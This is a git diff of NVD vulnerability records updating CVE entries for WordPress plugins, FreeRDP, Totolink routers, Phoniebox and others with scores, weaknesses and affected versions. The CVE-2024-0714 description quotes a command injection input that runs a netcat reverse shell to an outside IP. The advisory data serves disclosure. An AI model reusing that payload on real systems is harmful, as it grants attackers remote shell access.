"exploitabilityScore": 2.8,
"impactScore": 1.4
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-639"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:wp-eventmanager:user_profile_avatar:*:*:*:*:*:wordpress:*:*",
"versionEndExcluding": "1.0.1",
"matchCriteriaId": "BA47AAB1-B42E-4BC8-8154-37071A59BEDD"
}
]
}
]
}
],
"metrics": {},
"references": [
{
"url": "https://wpscan.com/vulnerability/fbdefab4-614b-493b-a9ae-c5aeff8323ef/",
"source": "contact@wpscan.com"
"source": "contact@wpscan.com",
"tags": [
"Exploit",
"Third Party Advisory"
]
}
]
}

69
CVE-2023/CVE-2023-64xx/CVE-2023-6447.json
View File

@ -2,19 +2,80 @@
"id": "CVE-2023-6447",
"sourceIdentifier": "contact@wpscan.com",
"published": "2024-01-22T20:15:47.553",
"lastModified": "2024-01-22T20:28:17.417",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-26T19:43:45.243",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "The EventPrime WordPress plugin before 3.3.6 lacks authentication and authorization, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id/event name."
},
{
"lang": "es",
"value": "El complemento EventPrime de WordPress anterior a 3.3.6 carece de autenticaci\u00f3n y autorizaci\u00f3n, lo que permite a visitantes no autenticados acceder a eventos privados y protegidos con contrase\u00f1a adivinando su identificaci\u00f3n num\u00e9rica/nombre del evento."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:metagauss:eventprime:*:*:*:*:*:wordpress:*:*",
"versionEndExcluding": "3.3.6",
"matchCriteriaId": "E74A78BC-487E-4CFC-B263-08FBD721C6AE"
}
]
}
]
}
],
"metrics": {},
"references": [
{
"url": "https://wpscan.com/vulnerability/e366881c-d21e-4063-a945-95e6b080a373/",
"source": "contact@wpscan.com"
"source": "contact@wpscan.com",
"tags": [
"Exploit",
"Third Party Advisory"
]
}
]
}

69
CVE-2023/CVE-2023-66xx/CVE-2023-6625.json
View File

@ -2,19 +2,80 @@
"id": "CVE-2023-6625",
"sourceIdentifier": "contact@wpscan.com",
"published": "2024-01-22T20:15:47.647",
"lastModified": "2024-01-22T20:28:17.417",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-26T19:47:43.497",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "The Product Enquiry for WooCommerce WordPress plugin before 3.1 does not have a CSRF check in place when deleting inquiries, which could allow attackers to make a logged in admin delete them via a CSRF attack"
},
{
"lang": "es",
"value": "El complemento Product Inquiry for WooCommerce de WordPress anterior a 3.1 no tiene una verificaci\u00f3n CSRF implementada al eliminar consultas, lo que podr\u00eda permitir a los atacantes hacer que un administrador que haya iniciado sesi\u00f3n las elimine mediante un ataque CSRF."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "REQUIRED",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 2.8,
"impactScore": 1.4
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-352"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:gravitymaster:product_enquiry_for_woocommerce:*:*:*:*:*:wordpress:*:*",
"versionEndExcluding": "3.1",
"matchCriteriaId": "15AFDBE1-3380-49CB-A16E-518D8FE4ED40"
}
]
}
]
}
],
"metrics": {},
"references": [
{
"url": "https://wpscan.com/vulnerability/d483f7ce-cb3f-4fcb-b060-005cec0ea10f/",
"source": "contact@wpscan.com"
"source": "contact@wpscan.com",
"tags": [
"Exploit",
"Third Party Advisory"
]
}
]
}

69
CVE-2023/CVE-2023-66xx/CVE-2023-6626.json
View File

@ -2,19 +2,80 @@
"id": "CVE-2023-6626",
"sourceIdentifier": "contact@wpscan.com",
"published": "2024-01-22T20:15:47.697",
"lastModified": "2024-01-22T20:28:17.417",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-26T19:58:01.737",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "The Product Enquiry for WooCommerce WordPress plugin before 3.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)"
},
{
"lang": "es",
"value": "El complemento Product Inquiry for WooCommerce de WordPress anterior a 3.1 no sanitiza ni escapa a algunas de sus configuraciones, lo que podr\u00eda permitir a usuarios con privilegios elevados, como el administrador, realizar ataques de Cross-Site Scripting Almacenado incluso cuando la capacidad unfiltered_html no est\u00e1 permitida (por ejemplo, en una configuraci\u00f3n multisitio)."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "HIGH",
"userInteraction": "REQUIRED",
"scope": "CHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 1.7,
"impactScore": 2.7
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-79"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:gravitymaster:product_enquiry_for_woocommerce:*:*:*:*:*:wordpress:*:*",
"versionEndExcluding": "3.1",
"matchCriteriaId": "15AFDBE1-3380-49CB-A16E-518D8FE4ED40"
}
]
}
]
}
],
"metrics": {},
"references": [
{
"url": "https://wpscan.com/vulnerability/327ae124-79eb-4e07-b029-e4f543cbd356/",
"source": "contact@wpscan.com"
"source": "contact@wpscan.com",
"tags": [
"Exploit",
"Third Party Advisory"
]
}
]
}

69
CVE-2023/CVE-2023-70xx/CVE-2023-7082.json
View File

@ -2,19 +2,80 @@
"id": "CVE-2023-7082",
"sourceIdentifier": "contact@wpscan.com",
"published": "2024-01-22T20:15:47.743",
"lastModified": "2024-01-22T20:28:17.417",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-26T19:48:56.570",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "The Import any XML or CSV File to WordPress plugin before 3.7.3 accepts all zip files and automatically extracts the zip file into a publicly accessible directory without sufficiently validating the extracted file type. This may allows high privilege users such as administrator to upload an executable file type leading to remote code execution."
},
{
"lang": "es",
"value": "El complemento Import any XML or CSV File to WordPress anterior a 3.7.3 acepta todos los archivos zip y extrae autom\u00e1ticamente el archivo zip en un directorio de acceso p\u00fablico sin validar suficientemente el tipo de archivo extra\u00eddo. Esto puede permitir a los usuarios con privilegios elevados, como el administrador, cargar un tipo de archivo ejecutable que conduzca a la ejecuci\u00f3n remota de c\u00f3digo."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "HIGH",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9
}
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:soflyy:export_any_wordpress_data_to_xml\\/csv:*:*:*:*:*:wordpress:*:*",
"versionEndExcluding": "3.7.3",
"matchCriteriaId": "1AC2EA9D-3A33-4765-A9D7-715DB111A4C5"
}
]
}
]
}
],
"metrics": {},
"references": [
{
"url": "https://wpscan.com/vulnerability/7f947305-7a72-4c59-9ae8-193f437fd04e/",
"source": "contact@wpscan.com"
"source": "contact@wpscan.com",
"tags": [
"Exploit",
"Third Party Advisory"
]
}
]
}

67
CVE-2024/CVE-2024-07xx/CVE-2024-0714.json
View File

@ -2,16 +2,40 @@
"id": "CVE-2024-0714",
"sourceIdentifier": "cna@vuldb.com",
"published": "2024-01-19T15:15:08.997",
"lastModified": "2024-01-19T15:56:19.500",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-26T20:01:19.683",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 -e /bin/bash; leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251540. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."
},
{
"lang": "es",
"value": "Se encontr\u00f3 una vulnerabilidad en MiczFlor RPi-Jukebox-RFID hasta 2.5.0. Ha sido calificada como cr\u00edtica. Una funci\u00f3n desconocida del archivo userScripts.php del componente HTTP Request Handler es afectada por esta vulnerabilidad. La manipulaci\u00f3n de la carpeta de argumentos con la entrada ;nc 104.236.1.147 4444 -e /bin/bash; conduce a la inyecci\u00f3n de comando del sistema operativo. El ataque puede lanzarse de forma remota. El exploit ha sido divulgado al p\u00fablico y puede utilizarse. El identificador de esta vulnerabilidad es VDB-251540. NOTA: Se contact\u00f3 primeramente con el proveedor sobre esta divulgaci\u00f3n, pero no respondi\u00f3 de ninguna manera."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9
},
{
"source": "cna@vuldb.com",
"type": "Secondary",
@ -60,6 +84,16 @@
]
},
"weaknesses": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-78"
}
]
},
{
"source": "cna@vuldb.com",
"type": "Secondary",
@ -71,14 +105,39 @@
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:sourcefabric:phoniebox:*:*:*:*:*:*:*:*",
"versionEndIncluding": "2.5.0",
"matchCriteriaId": "F8AF6C60-C327-481D-A29A-19B1B5ACA071"
}
]
}
]
}
],
"references": [
{
"url": "https://vuldb.com/?ctiid.251540",
"source": "cna@vuldb.com"
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory"
]
},
{
"url": "https://vuldb.com/?id.251540",
"source": "cna@vuldb.com"
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
]
}
]
}

88
CVE-2024/CVE-2024-09xx/CVE-2024-0939.json Normal file
View File

@ -0,0 +1,88 @@
{
"id": "CVE-2024-0939",
"sourceIdentifier": "cna@vuldb.com",
"published": "2024-01-26T19:15:08.103",
"lastModified": "2024-01-26T19:15:08.103",
"vulnStatus": "Received",
"descriptions": [
{
"lang": "en",
"value": "A vulnerability has been found in Beijing Baichuo Smart S210 Management Platform up to 20240117 and classified as critical. This vulnerability affects unknown code of the file /Tool/uploadfile.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252184. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4
}
],
"cvssMetricV2": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"cvssData": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "SINGLE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5
},
"baseSeverity": "MEDIUM",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
}
]
},
"weaknesses": [
{
"source": "cna@vuldb.com",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-434"
}
]
}
],
"references": [
{
"url": "https://github.com/Yu1e/vuls/blob/main/an%20arbitrary%20file%20upload%20vulnerability%20in%20BaiZhuo%20Networks%20Smart%20S210%20multi-service%20security%20gateway%20intelligent%20management%20platform.md",
"source": "cna@vuldb.com"
},
{
"url": "https://vuldb.com/?ctiid.252184",
"source": "cna@vuldb.com"
},
{
"url": "https://vuldb.com/?id.252184",
"source": "cna@vuldb.com"
}
]
}

88
CVE-2024/CVE-2024-09xx/CVE-2024-0941.json Normal file
View File

@ -0,0 +1,88 @@
{
"id": "CVE-2024-0941",
"sourceIdentifier": "cna@vuldb.com",
"published": "2024-01-26T19:15:08.350",
"lastModified": "2024-01-26T19:15:08.350",
"vulnStatus": "Received",
"descriptions": [
{
"lang": "en",
"value": "A vulnerability was found in Novel-Plus 4.3.0-RC1 and classified as critical. This issue affects some unknown processing of the file /novel/bookComment/list. The manipulation of the argument sort leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-252185 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"attackVector": "ADJACENT_NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"availabilityImpact": "LOW",
"baseScore": 5.5,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 2.1,
"impactScore": 3.4
}
],
"cvssMetricV2": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"cvssData": {
"version": "2.0",
"vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P",
"accessVector": "ADJACENT_NETWORK",
"accessComplexity": "LOW",
"authentication": "SINGLE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "PARTIAL",
"baseScore": 5.2
},
"baseSeverity": "MEDIUM",
"exploitabilityScore": 5.1,
"impactScore": 6.4,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
}
]
},
"weaknesses": [
{
"source": "cna@vuldb.com",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-89"
}
]
}
],
"references": [
{
"url": "https://github.com/red0-ha1yu/warehouse/blob/main/novel-plus_sqlinject2.md",
"source": "cna@vuldb.com"
},
{
"url": "https://vuldb.com/?ctiid.252185",
"source": "cna@vuldb.com"
},
{
"url": "https://vuldb.com/?id.252185",
"source": "cna@vuldb.com"
}
]
}

92
CVE-2024/CVE-2024-09xx/CVE-2024-0942.json Normal file
View File

@ -0,0 +1,92 @@
{
"id": "CVE-2024-0942",
"sourceIdentifier": "cna@vuldb.com",
"published": "2024-01-26T20:15:54.403",
"lastModified": "2024-01-26T20:15:54.403",
"vulnStatus": "Received",
"descriptions": [
{
"lang": "en",
"value": "A vulnerability was found in Totolink N200RE V5 9.3.5u.6255_B20211224. It has been classified as problematic. Affected is an unknown function of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. VDB-252186 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
"attackVector": "NETWORK",
"attackComplexity": "HIGH",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 3.7,
"baseSeverity": "LOW"
},
"exploitabilityScore": 2.2,
"impactScore": 1.4
}
],
"cvssMetricV2": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"cvssData": {
"version": "2.0",
"vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N",
"accessVector": "NETWORK",
"accessComplexity": "HIGH",
"authentication": "NONE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 2.6
},
"baseSeverity": "LOW",
"exploitabilityScore": 4.9,
"impactScore": 2.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
}
]
},
"weaknesses": [
{
"source": "cna@vuldb.com",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-613"
}
]
}
],
"references": [
{
"url": "https://drive.google.com/file/d/1oWAGbmDtHDIUN1WSRAh4ZnuzHOuvTU4T/view?usp=sharing",
"source": "cna@vuldb.com"
},
{
"url": "https://vuldb.com/?ctiid.252186",
"source": "cna@vuldb.com"
},
{
"url": "https://vuldb.com/?id.252186",
"source": "cna@vuldb.com"
},
{
"url": "https://youtu.be/b0tU2CiLbnU",
"source": "cna@vuldb.com"
}
]
}

88
CVE-2024/CVE-2024-09xx/CVE-2024-0943.json Normal file
View File

@ -0,0 +1,88 @@
{
"id": "CVE-2024-0943",
"sourceIdentifier": "cna@vuldb.com",
"published": "2024-01-26T20:15:54.640",
"lastModified": "2024-01-26T20:15:54.640",
"vulnStatus": "Received",
"descriptions": [
{
"lang": "en",
"value": "A vulnerability was found in Totolink N350RT 9.3.5u.6255. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252187. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
"attackVector": "NETWORK",
"attackComplexity": "HIGH",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 3.7,
"baseSeverity": "LOW"
},
"exploitabilityScore": 2.2,
"impactScore": 1.4
}
],
"cvssMetricV2": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"cvssData": {
"version": "2.0",
"vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N",
"accessVector": "NETWORK",
"accessComplexity": "HIGH",
"authentication": "NONE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 2.6
},
"baseSeverity": "LOW",
"exploitabilityScore": 4.9,
"impactScore": 2.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
}
]
},
"weaknesses": [
{
"source": "cna@vuldb.com",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-613"
}
]
}
],
"references": [
{
"url": "https://drive.google.com/file/d/1OBs4kc1KvbqrMhQHs54WtwxxxiBoI0hL/view?usp=sharing",
"source": "cna@vuldb.com"
},
{
"url": "https://vuldb.com/?ctiid.252187",
"source": "cna@vuldb.com"
},
{
"url": "https://vuldb.com/?id.252187",
"source": "cna@vuldb.com"
}
]
}

88
CVE-2024/CVE-2024-09xx/CVE-2024-0944.json Normal file
View File

@ -0,0 +1,88 @@
{
"id": "CVE-2024-0944",
"sourceIdentifier": "cna@vuldb.com",
"published": "2024-01-26T20:15:54.863",
"lastModified": "2024-01-26T20:15:54.863",
"vulnStatus": "Received",
"descriptions": [
{
"lang": "en",
"value": "A vulnerability was found in Totolink T8 4.1.5cu.833_20220905. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252188. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
"attackVector": "NETWORK",
"attackComplexity": "HIGH",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 3.7,
"baseSeverity": "LOW"
},
"exploitabilityScore": 2.2,
"impactScore": 1.4
}
],
"cvssMetricV2": [
{
"source": "cna@vuldb.com",
"type": "Secondary",
"cvssData": {
"version": "2.0",
"vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N",
"accessVector": "NETWORK",
"accessComplexity": "HIGH",
"authentication": "NONE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"availabilityImpact": "NONE",
"baseScore": 2.6
},
"baseSeverity": "LOW",
"exploitabilityScore": 4.9,
"impactScore": 2.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
}
]
},
"weaknesses": [
{
"source": "cna@vuldb.com",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-613"
}
]
}
],
"references": [
{
"url": "https://drive.google.com/file/d/1YPisSnxM5CwSLKFgs9w5k5MtNUgiijVo/view?usp=sharing",
"source": "cna@vuldb.com"
},
{
"url": "https://vuldb.com/?ctiid.252188",
"source": "cna@vuldb.com"
},
{
"url": "https://vuldb.com/?id.252188",
"source": "cna@vuldb.com"
}
]
}

82
CVE-2024/CVE-2024-222xx/CVE-2024-22211.json
View File

@ -2,16 +2,40 @@
"id": "CVE-2024-22211",
"sourceIdentifier": "security-advisories@github.com",
"published": "2024-01-19T20:15:13.573",
"lastModified": "2024-01-19T22:52:48.170",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-26T20:24:56.133",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "FreeRDP is a set of free and open source remote desktop protocol library and clients. In affected versions an integer overflow in `freerdp_bitmap_planar_context_reset` leads to heap-buffer overflow. This affects FreeRDP based clients. FreeRDP based server implementations and proxy are not affected. A malicious server could prepare a `RDPGFX_RESET_GRAPHICS_PDU` to allocate too small buffers, possibly triggering later out of bound read/write. Data extraction over network is not possible, the buffers are used to display an image. This issue has been addressed in version 2.11.5 and 3.2.0. Users are advised to upgrade. there are no know workarounds for this vulnerability.\n"
},
{
"lang": "es",
"value": "FreeRDP es un conjunto de librer\u00edas y clientes de protocolos de escritorio remoto gratuitos y de c\u00f3digo abierto. En las versiones afectadas, un desbordamiento de enteros en `freerdp_bitmap_planar_context_reset` provoca un desbordamiento de b\u00fafer de almacenamiento din\u00e1mico. Esto afecta a los clientes basados en FreeRDP. Las implementaciones de servidor y proxy basadas en FreeRDP no se ven afectadas. Un servidor malicioso podr\u00eda preparar un `RDPGFX_RESET_GRAPHICS_PDU` para asignar b\u00faferes demasiado peque\u00f1os, lo que posiblemente desencadenar\u00eda posteriormente una lectura/escritura fuera de los l\u00edmites. La extracci\u00f3n de datos a trav\u00e9s de la red no es posible; los b\u00faferes se utilizan para mostrar una imagen. Este problema se solucion\u00f3 en las versiones 2.11.5 y 3.2.0. Se recomienda a los usuarios que actualicen. No se conocen workarounds para esta vulnerabilidad."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "nvd@nist.gov",
"type": "Primary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9
},
{
"source": "security-advisories@github.com",
"type": "Secondary",
@ -36,8 +60,18 @@
},
"weaknesses": [
{
"source": "security-advisories@github.com",
"source": "nvd@nist.gov",
"type": "Primary",
"description": [
{
"lang": "en",
"value": "CWE-190"
}
]
},
{
"source": "security-advisories@github.com",
"type": "Secondary",
"description": [
{
"lang": "en",
@ -50,18 +84,54 @@
]
}
],
"configurations": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:freerdp:freerdp:*:*:*:*:*:*:*:*",
"versionEndExcluding": "2.11.5",
"matchCriteriaId": "DB5227C7-C575-4667-87FD-A9C8802842B0"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:freerdp:freerdp:*:*:*:*:*:*:*:*",
"versionStartIncluding": "3.0.0",
"versionEndExcluding": "3.2.0",
"matchCriteriaId": "E789EA41-14DF-4B24-91AF-9043BF9AF3E1"
}
]
}
]
}
],
"references": [
{
"url": "https://github.com/FreeRDP/FreeRDP/commit/939e922936e9c3ae8fc204968645e5e7563a2fff",
"source": "security-advisories@github.com"
"source": "security-advisories@github.com",
"tags": [
"Patch"
]
},
{
"url": "https://github.com/FreeRDP/FreeRDP/commit/aeac3040cc99eeaff1e1171a822114c857b9dca9",
"source": "security-advisories@github.com"
"source": "security-advisories@github.com",
"tags": [
"Patch"
]
},
{
"url": "https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-rjhp-44rv-7v59",
"source": "security-advisories@github.com"
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Patch",
"Vendor Advisory"
]
}
]
}

80
CVE-2024/CVE-2024-224xx/CVE-2024-22400.json
View File

@ -2,16 +2,40 @@
"id": "CVE-2024-22400",
"sourceIdentifier": "security-advisories@github.com",
"published": "2024-01-18T20:15:08.360",
"lastModified": "2024-01-19T01:51:14.027",
"vulnStatus": "Awaiting Analysis",
"lastModified": "2024-01-26T20:55:37.543",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
"value": "Nextcloud User Saml is an app for authenticating Nextcloud users using SAML. In affected versions users can be given a link to the Nextcloud server and end up on a uncontrolled thirdparty server. It is recommended that the User Saml app is upgraded to version 5.1.5, 5.2.5, or 6.0.1. There are no known workarounds for this issue."
},
{
"lang": "es",
